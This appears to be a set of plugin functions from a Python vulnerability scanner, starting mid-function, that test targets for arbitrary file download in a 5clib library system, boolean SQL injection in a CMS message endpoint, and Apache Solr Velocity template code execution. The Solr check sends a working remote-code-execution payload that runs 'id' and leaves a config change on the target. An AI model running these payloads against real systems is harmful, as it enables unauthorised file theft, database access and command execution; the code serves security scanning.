            finding = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, e)
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check the 5clib download action for arbitrary file download.

    Requests ``kinweblistaction.action`` with ``filePath`` pointing at
    ``c:/windows/win.ini`` and records a finding when the response is 200
    and the body contains both ``MPEGVideo`` and ``support``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        Headers: Request headers supplied by the caller, sent unchanged.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to ClassCongregation.VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        probe_path = "/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini"
        payload_url = scheme + "://" + url + ":" + str(port) + probe_path

        resp = requests.get(payload_url, headers=Headers, timeout=6,
                            proxies=proxies, verify=False)
        body = resp.text
        status = resp.status_code
        # NOTE(review): 'support' is a common word, so the match leans mostly
        # on 'MPEGVideo'; confirm findings against the returned body.
        looks_like_win_ini = 'MPEGVideo' in body and 'support' in body
        if status == 200 and looks_like_win_ini:
            Medusa = "{}存在五车图书管理系统存在任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
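def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check the message-add endpoint for boolean-based SQL injection.

    Sends the same request twice, once with ``and 1=2`` and once with
    ``and 1=1`` appended to ``id``, and records a finding when both
    responses are 200, the first body contains '反馈已经被关闭', the second
    contains '验证码错误', and the two bodies differ.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to ClassCongregation.VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "42%20and%201=2"
        payload2 = "42%20and%201=1"
        # Both probes share everything up to the id value.
        endpoint = scheme + "://" + url + ":" + str(
            port
        ) + "/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn&para137=1&para186=1&para138=1&para139=1&para140=1&id="
        payload_url = endpoint + payload
        payload_url2 = endpoint + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        resp2 = requests.get(payload_url2,
                             headers=headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        # Fixed: the original read resp.status_code again here, so the status
        # of the second request was never actually checked.
        code2 = resp2.status_code
        if code == 200 and code2 == 200 and '反馈已经被关闭' in con \
                and '验证码错误' in con2 and con != con2:
            Medusa = "{}存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}\r\n{}".format(
                url, payload_url, con, con2)
            _t = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)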
def medusa(Url,RandomAgent,Token,proxies=None):
    """Check an Apache Solr core for Velocity template code execution.

    Three requests are made: a GET to ``/solr/admin/cores`` to learn a core
    name, a POST to that core's ``/config`` that sets up a
    ``VelocityResponseWriter`` with the params resource loader enabled, and
    a GET to ``/select`` with an inline Velocity template that runs ``id``.
    A finding is recorded when the last response is 200 and its body
    contains ``uid=``, ``gid=`` and ``groups=``.

    This check changes state on the target: the config POST is not undone
    anywhere in this function.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to ClassCongregation.VulnerabilityDetails.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        # NOTE(review): this request does not pass verify=False, unlike the
        # two that follow, so TLS verification is inconsistent within the check.
        step1 =requests.get(payload_url, timeout=6, proxies=proxies,headers = headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            # Keeps the last key of data['status']; if it is empty, name stays
            # '' and the requests below are still sent with an empty core name.
            for x in data['status']:
                name = x
            payload = "/solr/"+name+"/config"
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
            payload_url1 = scheme + "://" + url +":"+ str(port)+ payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            # JSON body for the config request.
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',

            }
            # The response to the config POST is not inspected; only the
            # follow-up select response decides the outcome.
            resp = requests.post(payload_url1,data=payload_data,headers=headers1, proxies=proxies,timeout=6, verify=False)
            resp2 = requests.get(payload_url2, headers=headers, timeout=6,proxies=proxies, verify=False)
            con2 = resp2.text
            cod2=resp2.status_code
            if con2.find("uid=") != -1 and con2.find("groups=") != -1 and con2.find("gid=") != -1 and cod2==200:
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nPayload:\r\n{}回显内容:{}\r\n\r\n".format(url,payload_url2,con2)
                _t=VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write()  # Hand the finding (target and scan output) to the result writer.
                ClassCongregation.WriteFile().result(str(url),str(Medusa))# Write the result to a file; url is used as the file name.
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # Call the log writer with the URL and the failing plugin's name.